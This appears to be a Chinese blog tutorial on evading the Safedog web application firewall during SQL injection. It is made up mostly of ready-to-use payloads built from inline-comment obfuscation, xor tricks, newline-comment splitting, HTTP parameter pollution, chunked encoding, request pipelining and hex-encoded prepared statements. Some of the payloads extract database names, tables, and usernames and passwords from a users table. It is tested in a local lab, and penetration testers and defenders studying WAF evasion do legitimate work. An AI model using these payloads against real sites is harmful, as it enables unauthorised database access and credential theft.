SQL注入 WAF绕过

安全狗

环境准备

安全狗:apace4.0版

apace:2.49版本

mysql:5.7版本

and/or xxx=xxx绕过

安全狗不会单个拦截and/or,但是当后面跟了xxx=xxx或者一个数字/字符就会拦截

绕过方法:

  1. 内联注释
  2. 用其他字符替换 and 或者 or
  3. 带入的不是字符串和数字型,带入特殊字符或者特殊函数

内联注释/*! /:在mysql中,/! */被称为内联注释,里面的内容是会被mysql解析的,解析情况分为以下两种:

1.当/*!紧跟数据库版本号时

这种情况表示,当目前的数据库版本号大于指定的版本号时,里面的内容才会被解释SQL语句,否则会被当做注释处理而被忽略掉

CREATE DATABASE `mydb` /*!40100 DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci */
表示当 MySQL 的版本号大于 4.1.00 时,后面的 SQL 语句才会被执行。

2.当/*!不紧跟版本号时

这种情况下,里面的内容会被当做SQL语句解析执行

– 内联注释语句

SELECT * FROM `demo` /*! where id = 2 */;

– 解析后的语句相当于

SELECT * FROM `demo` where id = 2;
内联注释绕过

可以看到直接使用内联注释是不行的,必须加上版本号

关于哪个版本号才可以,可以自已多试几个,也可采用fuzz的形式(burpfuzz或者写个脚本都可以),可以先用小数字去试

payload:?id=1’ /*!112and*/ 1=1--+

用xor(^)代替and
paylaod:?id=1'^(1)^'1'='1--+

order by绕过

可以看到order by是直接被拦截的

绕过方法:

  1. 内敛注释
  2. 单行注释+换行绕过
内敛注释绕过
payload:?id=1' order/*//*//*//*/by 4--+

注:中间的//可以换成任意的垃圾字符,但不要是/*

单行注释+换行绕过
payload:?id=1' order#%0aby 3

注:这样虽然能绕过,但由于后面的注释不了,所以判断不了字段数,不建议使用

union select绕过

安全狗对于单个的union,select并不拦截,但是对union select的结构拦截

绕过方法:

  1. 内联注释
  2. 单行注释+换行
内联注释饶过
payload:?id=-1' /*!unIon/*//*//*//*/sElect*/ 1,2,3 limit 0,1--+

这里的版本号可以fuzz,但我试了不填也可以

单行注释+换行
payload:?id=-1' union#%0aselect 1,2,3 '1'='1

缺点同上面的order by单行注释+换行

常用函数绕过

database()

安全狗对于database()是直接拦截的

绕过方法:

  1. 内联注释
payload:?id=-1' /*!union/*//*//*//*/select*/ 1,/*!database(/*//*/)*/,3--+

user()

绕过方法:

  1. 内联注释

payload与database()一样

payload:?id=-1' /*!union/*//*//*//*/select*/ 1,/*!user(/*//*/)*/,3--+

extractvalue()/updatexml()

安全狗不会拦截extractvalue和updatexml,但是加个括号会拦截

绕过方法:

  1. 内联注释+单行注释+换行
payload:?id=1'^(/*!--+/*%0aextractvalue(1,concat(0x7e,/*!database(/*//*/)*/,0x7e)))^'1'='1*/--+

updatexml同上,不多赘述

substr()

安全狗并不拦截substr()函数

测试payload:?id=1'^(substr(('abc'),1,1)=0x61)^'1'='1*/--+

猜解库:

payload:?id=1'^(substr((select /*!database(/*//*/)*/),1,1)=0x73)^'1'='1*/--+

其余同理

if()

安全狗不会拦截if函数

sleep()

绕过方法:

  1. 内联注释绕过
  2. 内联注释+单行注释+换行
内联注释绕过
payload:?id=1'^(if(2>1,/*!sleep(1/*//*/)*/,0))^'1'='1--+

注释+换行绕过
payload:?id=1'^(if(2>1,/*!--+/*%0asleep(1/*//*/)*/,0))^'1'='1--+

常用库、表绕过

经测试,information_schema.schemata,information_schema.tables,information_schema.column之类的系统库都会直接被拦截

绕过方法:

  1. 单行注释+换行+内联注释
查库
payload:?id=-1' /*!union/*//*//*//*/select*/ 1,group_concat(schema_name),3 from /*!--+/*%0ainformation_schema*/./*!schemata*/--+

查表
?id=-1' /*!union/*//*//*//*/select*/ 1,group_concat(table_name),3 from /*!--+/*%0ainformation_schema*/./*!tables*/ where /*!/*!database(/*//*/)*/='security'--+*/--+

这样是不行的,虽然安全狗没有拦截单引号,但是会被转义,导致无法查到对应表

绕过方法:

  1. 16进制编码
payload:?id=-1' /*!union/*//*//*//*/select*/ 1,group_concat(table_name),3 from /*!--+/*%0ainformation_schema*/./*!tables*/ where table_schema=0x7365637572697479--+

不知道为什么,这里用database形式是无法查出表名的

payload:?id=-1' /*!union/*//*//*//*/select*/ 1,group_concat(table_name),3 from /*!--+/*%0ainformation_schema*/./*!tables*/ where /*!database(/*//*/)=0x7365637572697479*/--+

查列名同上
查数据
payload:?id=-1' /*!union/*//*//*//*/select*/ 1,group_concat(username),group_concat(password) from /*!--+/*%0asecurity.users*/--+

HPP参数污染

HTTP参数污染,也叫HPP(HTTP Parameter Pollution)。简单地讲就是给一个参数赋上两个或两个以上的值,由于现行的HTTP标准没有提及在遇到多个输入值给相同的参数赋值时应该怎样处理,而且不同的网站后端做出的处理方式是不同的,从而造成解析错误。

注:有无HPP漏洞主要是由服务端处理方式和用户配置决定,不一定都有这个漏洞

环境准备

  1. Apache:2.49版本
  2. waf:安全狗Apache4.0版
  3. mysql:5.7版

测试:

可以看到这里解析了id=1没有解析id=0

综上可得,这里Apache会解析最后一个参数,其他会忽略

安全狗绕过

payload:?id=0 /*&id=' union select 1,database(),3--+*/

可以看到安全狗没有拦截

payload:?id=0 /*&id=' union select 1,group_concat(username),group_concat(password) from security.users--+*/

经测试,用这种方式,延时,布尔,联合注入都没有过滤,常规语句直接用就行

分块传输

分块传输编码(Chunked transfer encoding)是HTTP中的一种数据传输机制,在HTTP/1.1中,服务器发送给客户端的数据可以分成多个部分,在HTTP/1.1前,数据的发送是由Content-Length去决定的,它规定了一个包的长度,服务器也是按照这个去进行处理的。但是,使用分块传输的时候,数据会被分解出一个个小块,这样服务器就不需要预先知道总数据的大概长度,接收到一个个块进行处理就行了。
正常我们发送很小的数据是不需要用到分块技术的,而下载大文件,或者发送一些后台需要很复杂的逻辑才能处理的请求的时候,就需要实时生成消息长度,服务器一般会使用Chunked编码。在进行Chunked编码进行传输的时候,响应头会有Transfer-Encoding: Chunked,去表明是使用Chunked编码传输内容的。分块技术的具体过程就是,实体直接被分割成多个块,即是应用层的数据在TCP传输的过程中,不作任何解释,全部理解成二进制流,然后按照MSS的长度切分,然后一起压到TCP协议栈里面,剩下的对这些二进制数据的具体解释,则交由应用层解决

在yakit中,可以很方便的一键转换为chunk编码

值得注意的是,chunk编码服务端并不一定支持,所以需要先进行测试

参考文章

pipline绕过注入

当请求中的Connection字段值为keep-alive,则代表本次发起的请求所建立的tcp连接不断开,直到所发送内容结束Connection为close为止。部分WAF可能只对第一次传输过来的请求进行过滤处理。

正常请求被拦截:

img

利用pipline进行绕过:

首先关闭burp的Repeater的Content-Length自动更新

img

修改Connection字段值为keep-alive,将带有攻击语句的数据请求附加到正常请求后面再发送一遍。

img

yakit中也有相关的功能

可以看到关闭自动修复长度后,服务端将该请求视为两次不同的请求,分别作出响应

prepare语法

基本语法

prepare stmt_name from preparable_stmt;
execute stmt_name [using @var_name [, @var_name] ...];
{deallocate | drop} prepare stmt_name;
@a = 73656c656374202a2066726f6d2073656375726974792e75736572733b; pRepare flag from @a;EXECUTE flag;

可以看到安全狗不拦截,当然前提是mysql要开启多句执行,在本地测试时要加上set,并且set和变量之间不能有空格

set@a = 0x73656c656374202a2066726f6d2073656375726974792e7573657273; pRepare flag from @a;EXECUTE flag;

注意点

  1. 如果16进制有e可能会被认为是科学计数法
  2. 似乎不支持太长的16进制字符串
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值